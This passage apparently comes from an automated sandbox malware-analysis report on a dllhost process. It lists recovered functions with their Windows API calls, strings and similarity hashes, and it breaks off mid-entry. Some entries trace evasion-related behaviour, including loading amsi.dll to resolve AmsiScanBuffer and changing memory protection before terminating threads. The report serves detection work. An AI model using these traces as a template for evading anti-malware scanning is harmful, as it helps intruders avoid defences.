Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 552cd986716dc2360bbd0bfb5cd554ecba3bb90b827f61cc2ba0a69a9b7620db
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: AA510735201F6685EB25DBA4DE583A8A3A1FF24747F804817F52D833A9EF78C598C348

Function 0000025DC1AC35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,0000025DC1AC24D1), ref: 0000025DC1AC35EB
HeapAlloc.KERNEL32(?,?,?,?,?,0000025DC1AC24D1), ref: 0000025DC1AC35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,0000025DC1AC24D1), ref: 0000025DC1AC3673
GetProcessHeap.KERNEL32(?,?,?,?,?,0000025DC1AC24D1), ref: 0000025DC1AC36D9
HeapFree.KERNEL32(?,?,?,?,?,0000025DC1AC24D1), ref: 0000025DC1AC36E7

Strings

$rbx-, xrefs: 0000025DC1AC366C

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 05a7fb13811c9c93b491c5fc603bcdb2946da1d33d73974d70d63c59ae98ca77
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: B4319121701F6192EA35DFA6ED5836AA7A0FF64B87F0880229F4887B55EF35C462C704

Function 0000025DC1CE35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,0000025DC1CE24D1), ref: 0000025DC1CE35EB
HeapAlloc.KERNEL32(?,?,?,?,?,0000025DC1CE24D1), ref: 0000025DC1CE35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,0000025DC1CE24D1), ref: 0000025DC1CE3673
GetProcessHeap.KERNEL32(?,?,?,?,?,0000025DC1CE24D1), ref: 0000025DC1CE36D9
HeapFree.KERNEL32(?,?,?,?,?,0000025DC1CE24D1), ref: 0000025DC1CE36E7

Strings

$rbx-, xrefs: 0000025DC1CE366C

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: a485d9dc14f501bfd9719000ed9171ef53dcb96f205bc148da16bfbfe82da6f7
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 73318221701F6182E721DFA6DE48669A3A4BF64B87F049022EF5887755EF34E4A1CB08

Function 0000025DC1ACC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000025DC1ACC94F
SetLastError.KERNEL32 ref: 0000025DC1ACC96E
FlsSetValue.KERNEL32 ref: 0000025DC1ACC997
FlsSetValue.KERNEL32 ref: 0000025DC1ACC9A8
FlsSetValue.KERNEL32 ref: 0000025DC1ACC9B9

Part of subcall function 0000025DC1ACD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000025DC1AC674A), ref: 0000025DC1ACD2B6
Part of subcall function 0000025DC1ACD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000025DC1AC674A), ref: 0000025DC1ACD2C0

SetLastError.KERNEL32 ref: 0000025DC1ACC9DC

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 9934a0b1038e0e1e9f223560c3f50238ac89a25dd2486ef70e09daa121a04795
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: C7113025300F7052FE74EBF56C2D3AA5152ABA47A3F544626E866D73CADE39C403C348

Function 0000025DC1CEC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000025DC1CEC94F
SetLastError.KERNEL32 ref: 0000025DC1CEC96E
FlsSetValue.KERNEL32 ref: 0000025DC1CEC997
FlsSetValue.KERNEL32 ref: 0000025DC1CEC9A8
FlsSetValue.KERNEL32 ref: 0000025DC1CEC9B9

Part of subcall function 0000025DC1CED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000025DC1CE674A), ref: 0000025DC1CED2B6
Part of subcall function 0000025DC1CED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000025DC1CE674A), ref: 0000025DC1CED2C0

SetLastError.KERNEL32 ref: 0000025DC1CEC9DC

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: ece7337109bbadf03801841b83c505349a16c698621d59818f8e017e123bdac0
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: F1114221600EB142F634A7F1AE1D36E9151BFA47A3F544627F966D63C6CE38D481C30C

Function 0000025DC1AC1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000025DC1AC1A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000025DC1AC1A74
PathFindFileNameW.SHLWAPI ref: 0000025DC1AC1A83
lstrlenW.KERNEL32 ref: 0000025DC1AC1A8F
StrCpyW.SHLWAPI ref: 0000025DC1AC1AA2
CloseHandle.KERNEL32 ref: 0000025DC1AC1AB0

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 04e43806734fe15de06808428a7c989495e73ebb507d9f8212fe42b965858533
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 1F015B31700F50C6EA20EB52A85835963A1FB98FD2F884036DE5D83754DE38C586C744

Function 0000025DC1CE1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000025DC1CE1A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000025DC1CE1A74
PathFindFileNameW.SHLWAPI ref: 0000025DC1CE1A83
lstrlenW.KERNEL32 ref: 0000025DC1CE1A8F
StrCpyW.SHLWAPI ref: 0000025DC1CE1AA2
CloseHandle.KERNEL32 ref: 0000025DC1CE1AB0

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 4c402226a9590750ec87af66d6d000f4ab80615fa1bfb99ac3034134f7ec2a32
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: B3015B21700E5082EA20DB92E958759A3A1FB98FC2F494036EF5D83754DE38C589C744

Function 0000025DC1AC3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000025DC1AC3AAC), ref: 0000025DC1AC3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000025DC1AC3AAC), ref: 0000025DC1AC3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000025DC1AC3AAC), ref: 0000025DC1AC3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000025DC1AC3AAC), ref: 0000025DC1AC3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000025DC1AC3AAC), ref: 0000025DC1AC3E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000025DC1AC3AAC), ref: 0000025DC1AC3EAE

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 641470d16f68c19e2d82bae23d9ca82b48d5204da13c93edf8603a2950fb538d
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 98011B65211F60C6EB34EBA1EC5C72962B0BFA5B57F040026C94D87764EF3DC45ACB08

Function 0000025DC1CE3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000025DC1CE3AAC), ref: 0000025DC1CE3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000025DC1CE3AAC), ref: 0000025DC1CE3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000025DC1CE3AAC), ref: 0000025DC1CE3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000025DC1CE3AAC), ref: 0000025DC1CE3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000025DC1CE3AAC), ref: 0000025DC1CE3E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000025DC1CE3AAC), ref: 0000025DC1CE3EAE

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 0695c836124f3e3d4d379e0a2543f612936755f36863678de2532ec0f44f88e4
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 38011B75611F50C2EB34DBA1ED4C715A2A0BB65B47F04002AEA4D873A4EF3DC488C708

Function 0000025DC1AC1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000025DC1AC1AF4
StrCmpNIW.SHLWAPI ref: 0000025DC1AC1B0E
lstrlenW.KERNEL32 ref: 0000025DC1AC1B1D
StrCpyW.SHLWAPI ref: 0000025DC1AC1B32

Strings

\\?\, xrefs: 0000025DC1AC1B02

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: a9d95906869f7ddc41ba09c08d509079ec6be9b979eec37ce0dc4d9d50ef4695
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 55F08132304F95D2EB30DB64E8983596370F764B8BFC440229A4983654DE7CC64ACB04

Function 0000025DC1CE1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000025DC1CE1AF4
StrCmpNIW.SHLWAPI ref: 0000025DC1CE1B0E
lstrlenW.KERNEL32 ref: 0000025DC1CE1B1D
StrCpyW.SHLWAPI ref: 0000025DC1CE1B32

Strings

\\?\, xrefs: 0000025DC1CE1B02

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: bc9cf7b7948986a81fa55254aaf6f582f6236ce3a87e73a2003b49c7be58f10d
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 22F0A462314A9492EB30CB64FE88359E360F764B8BF844022FB4982954DE7CC698C708

Function 0000025DC1AC3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,0000025DC1AC275A), ref: 0000025DC1AC372A
StrCpyW.SHLWAPI ref: 0000025DC1AC373A
StrCatW.SHLWAPI ref: 0000025DC1AC3746
PathCombineW.SHLWAPI(?,?,00000000,0000025DC1AC275A), ref: 0000025DC1AC3754

Strings

\\.\pipe\, xrefs: 0000025DC1AC3720

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 8806cf99a071f362793b02f797e9d5d22f34af4a36c54536461c0e2dd4e89e36
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 36F05E64704FA0C2EE24EB92BD281196261BB58FC3F448032EE5A87B19CE38C446C708

Function 0000025DC1ACB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000025DC1ACB929
GetProcAddress.KERNEL32 ref: 0000025DC1ACB93F
FreeLibrary.KERNEL32 ref: 0000025DC1ACB95B

Strings

mscoree.dll, xrefs: 0000025DC1ACB920
CorExitProcess, xrefs: 0000025DC1ACB938

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 1ecb0b4b01f3dea65e6482445bf5a479574b8f3dbf29905c01b3ddb7e9e7e446
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 79F09661300F1185EE34DB949C583692330EB597A3F54071ADA69C63F4DF3DC44AC308

Function 0000025DC1CE3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,0000025DC1CE275A), ref: 0000025DC1CE372A
StrCpyW.SHLWAPI ref: 0000025DC1CE373A
StrCatW.SHLWAPI ref: 0000025DC1CE3746
PathCombineW.SHLWAPI(?,?,00000000,0000025DC1CE275A), ref: 0000025DC1CE3754

Strings

\\.\pipe\, xrefs: 0000025DC1CE3720

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 5cda55a371e1d5876e944b12d0f19c96807f0b77f3b9137c389c69cebaeae176
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: F4F05E64704FA0C2EA248B96FE18119E661FB68FC3F449032FE5A87B18CE38C449C708

Function 0000025DC1CEB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000025DC1CEB929
GetProcAddress.KERNEL32 ref: 0000025DC1CEB93F
FreeLibrary.KERNEL32 ref: 0000025DC1CEB95B

Strings

CorExitProcess, xrefs: 0000025DC1CEB938
mscoree.dll, xrefs: 0000025DC1CEB920

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: e4dc16f572de32b697362fca7f386bcb099319e77dd18cd3dd70c7a68d8abb8c
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 4BF09061211E6181EA34CBA4ED8D369A330FBA9763F54031BFA6A851E4DF3CC489C308

Function 0000025DC1AC1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0000025DC1AC1E47
GetProcAddress.KERNEL32 ref: 0000025DC1AC1E57
Sleep.KERNEL32 ref: 0000025DC1AC1E67

Strings

AmsiScanBuffer, xrefs: 0000025DC1AC1E50
amsi.dll, xrefs: 0000025DC1AC1E40

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 9617fb6b13abb7afbda2873504d7972334cd5f783831b631bd50b566f9054518
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
